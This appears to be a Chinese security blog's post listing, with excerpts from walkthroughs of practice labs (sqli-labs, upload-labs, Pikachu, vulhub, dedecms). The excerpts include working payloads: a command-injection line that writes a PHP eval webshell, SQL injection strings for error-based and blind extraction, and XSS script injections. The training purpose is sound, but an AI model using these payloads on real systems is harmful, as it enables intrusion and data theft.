- 博客(38)
- 收藏
- 关注
原创 dedecms靶场(四种webshell姿势)
2.点击【生成】【更新主页HTML】将主页位置修改为【./index.php】点击 【生成静态】点击 【更新主页HTML】 再次访问站点首页可发现变化..
2024-09-14 18:41:02 524
原创 vulhub spring 远程命令执行漏洞(CVE-2022-22963)
vulhub spring 远程命令执行漏洞(CVE-2022-22963)
2024-09-08 12:38:03 511
原创 vulhub GhostScript 沙箱绕过(CVE-2018-16509)
cd vulhub/ghostscript/CVE-2018-16509 #进入漏洞环境所在目录。docker-compose up -d #启动靶场。docker ps #查看容器信息。
2024-09-07 11:45:00 365
原创 vulhub Thinkphp5 2-rce远程代码执行漏洞
cd /vulhub/thinkphp/2-rce #进入漏洞环境所在目录。docker-compose up -d #启动靶场。docker ps #查看容器信息。
2024-09-07 10:46:32 399
原创 Pikachu靶场之RCE漏洞详解
127.0.0.1&echo "<?php @eval($_POST[cmd]);?>)" > 6.phpfputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"])?>');
2024-09-06 14:32:41 555
原创 pikachu文件包含漏洞靶场攻略
远程包含漏洞的前提:需要php.ini配置如下:allow_url_fopen=on //默认打开Allow_url_include=on //默认关闭。
2024-09-03 18:33:53 802
原创 Upload-labs 1-21关 靶场通关攻略(全网最全最完整)
Pass-01步骤一:将一个php文件重命名为jpg文件步骤二:上传1.jpg抓包,将后改为php,放行步骤三:图片右键新建标签页打开图片,复制图片地址去蚁剑连接Pass-02步骤一:上传1.jpg抓包,将后改为php,放行步骤二:图片右键新建标签页打开图片,复制图片地址去蚁剑连接Pass-03步骤一:php文件重命名为1.php5步骤二:上传1.php5文件,图片右键新建标签页打开图片,复制图片地址去蚁剑连接Pass-04步骤一:
2024-08-30 15:33:01 639
原创 sqli-labs靶场通关攻略(51-60)
?sort=1' and updatexml(1,concat(1,(select database())),1) --+?sort=1' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)--+判断数据库的第一个字符用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于114 页面延迟三秒访问
2024-08-30 11:41:03 1708
原创 sqli-labs靶场通关攻略(21-30关)
可以看见这里返回了很多信息,包括了自己的Cookie。但是Cookie却是一串奇怪的字符串,看得出来这是bse64编码。解码查看。
2024-08-26 08:48:29 899
原创 sqli-labs靶场通关攻略(11-20关)
判断数据库第一位字符的ascii码是否大于115 页面显示异常 说明不大于 大于114不大于115 说明第一位字符ascii码等于115。判断数据库第一位字符的ascii码是否大于115 页面显示异常 说明不大于 大于114不大于115 说明第一位字符ascii码等于115。说明users表里面的username字段的第一条数据的第一个字符的ascii码为68'D'说明users表里面的username字段的第一条数据的第一个字符的ascii码为68'D'
2024-08-26 08:47:06 1029
原创 sqli-labs靶场通关攻略(1-10关)
判断数据库第一位字符的ascii码是否大于115 页面显示异常 说明不大于 大于114不大于115 说明第一位字符ascii码等于115。判断数据库第一位字符的ascii码是否大于115 页面正常显示 说明不大于 大于114不大于115 说明第一位字符ascii码等于115。判断数据库第一位字符的ascii码是否大于115 页面正常显示 说明不大于 大于114不大于115 说明第一位字符ascii码等于115。说明users表里面的username字段的第一条数据的第一个字符的ascii码为68'D'
2024-08-26 08:42:13 452
原创 pikachu-xss通关攻略
alert(1)</script>,没有显示,打开源代码查看,发现输入被包括在<script></script>标签中,需要在输入前面输</script>闭合前面的<script>标签。这一关会过滤掉<script>alert(1)</script>,采用大小写绕过,输入<sCript>alert(1)</scriPt>2.输入框输入</script><script>alert(1)</script> 弹出1。输入框输入<script>alert(1)
2024-08-22 17:50:25 882
原创 PostGREsql手工注入(墨者学院)
order by 5的时候没有数据回显,order by 4 有回显数据,所以后端返回到前端的数据字段数为4个。
2024-08-20 19:10:27 410
原创 Mssql手工注入
第⼆张表:-1'and 1=(select top 1 name from sysobjects where xtype='U' and n。第三张表:-1'and 1=(select top 1 name from sysobjects where xtype='U' and n。第四张表:-1'and 1=(select top 1 name from sysobjects where xtype='U' and n。步骤⼀:在第⼀关使⽤单双引号判断是否存在注⼊,根据报错的回显可知数据类型为字符型。
2024-08-20 17:10:06 477
原创 ACCESS环境搭建
通过网盘分享的文件:1111.zip链接: https://pan.baidu.com/s/1j2um1mtfne42H9mNNDj6Pg?pwd=qikx 提取码: qikx。
2024-08-20 11:25:46 149
原创 Al-Web-1.0 靶机复现
找到根目录/home/www/html/web1x443290o2sdf92213。这个是有两层目录的,uploads禁止访问, 查看上一级的目录文件情况。看到,输入框示意输入数字,出现如下结果说明存在SQL注入。
2024-08-19 17:32:13 166
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人